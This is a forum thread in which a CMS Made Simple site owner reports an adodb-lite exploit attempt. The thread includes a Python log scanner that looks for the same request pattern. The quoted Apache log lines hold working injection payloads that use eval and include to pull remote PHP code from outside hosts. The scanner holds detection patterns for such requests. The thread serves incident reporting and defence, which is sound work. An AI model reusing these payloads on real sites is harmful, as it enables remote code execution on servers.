attacked by adodb-lite exploit

Post by ventilo35 »

Hi people

I had a warning from the hosting company about some people attempting to hack my (old version) CMSMS... Because of the delay before the Apache log is available, I had no hint, so I settled on upgrading to v1.4.1. The day after, I had another warning, and also access to the (first attack) log, so I could see the problem:

web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:16 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 200 61 "-" "libwww-perl/5.65"

web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:19 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/no/modules/readme.txt??? HTTP/1.1" 500 543 "-" "libwww-perl/5.65"

I then proceeded to replace adodb-lite with the full adodb and set $config['use_adodb_lite'] to false...
No attack so far.

Is it a known problem? Am I secure enough after replacing adodb-lite? Should everybody stop using adodb-lite?

Thanks
7BZH
Pierre M.

Re: attacked by adodb-lite exploit

Post by Pierre M. »

See the security guide... Such remote access to /lib with a double slash or http in the URL is easily filtered out.

Pierre M.
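
The request pattern discussed above (a script under /lib called directly, with a remote URL or PHP code in the query string) can also be picked out of an access log after the fact. This Python example is added here and is not part of any post in this thread or of CMS Made Simple; the rule names, the `decode`, `indicators` and `scan` helpers and the sample log lines are assumptions of the example, and "double slash" is read here as a doubled slash in the path.

```python
import re
from urllib.parse import unquote

# Layout of the log in the first post: client vhost - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
REMOTE_URL = re.compile(r'(?:https?|ftp)://')
PHP_CODE = re.compile(r'\b(?:eval|include|require)\s*\(|\$_(?:get|post|request|cookie)\b')

def decode(text, rounds=3):
    """Percent-decode several times so double-encoded values are still seen."""
    for _ in range(rounds):
        text = unquote(text)
    return text.lower()

def indicators(target):
    """Rule names (this example's own) matched by one request target."""
    path, _, query = target.partition("?")
    path, query = decode(path), decode(query)
    found = []
    if "//" in path:
        found.append("double-slash-path")
    if REMOTE_URL.search(query):
        found.append("remote-url-in-query")
    if PHP_CODE.search(query):
        found.append("php-code-in-query")
    if found and path.lstrip("/").startswith("lib/"):
        found.append("lib-path")
    return found

def scan(lines):
    """Yield a record per matching line; served=True (2xx/3xx) means the script answered."""
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        found = indicators(match["target"]) if match else []
        if found:
            yield {"line": number, "client": match["client"],
                   "served": match["status"][0] in "23", "rules": found}

# Constructed sample lines (documentation hosts and addresses), not the poster's log.
SAMPLE = [
    '198.51.100.7 www.example.org - [21/Sep/2008:11:09:16 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=x&a=http://files.example.net/note.txt HTTP/1.1" 200 61 "-" "libwww-perl/5.65"',
    '198.51.100.7 www.example.org - [21/Sep/2008:11:09:19 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?a=http%253A%252F%252Ffiles.example.net%252Fnote.txt HTTP/1.1" 500 543 "-" "libwww-perl/5.65"',
    '192.0.2.44 www.example.org - [21/Sep/2008:11:10:02 +0200] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 www.example.org - [21/Sep/2008:11:12:40 +0200] "GET /lib//adodb_lite/adodb-perf-module.inc.php?w=include(%24_GET%5Ba%5D) HTTP/1.1" 403 210 "-" "-"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Hits with `served` set to true are the ones to review first, since the server answered the request instead of rejecting it.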
jmlarsen
New Member
Posts: 3
Joined: Sun Aug 24, 2008 1:53 pm

Re: attacked by adodb-lite exploit

Post by jmlarsen »

You should be safe when using the full ADODB, since the vulnerability only exists in the lite version.

See http://attrition.org/pipermail/vim/2007 ... 01800.html
lg37
Forum Members
Posts: 20
Joined: Tue Jan 03, 2006 11:04 am

Re: attacked by adodb-lite exploit

Post by lg37 »

I was also attacked through this ADODB_lite exploit ...

moved to adodb full version

Best regards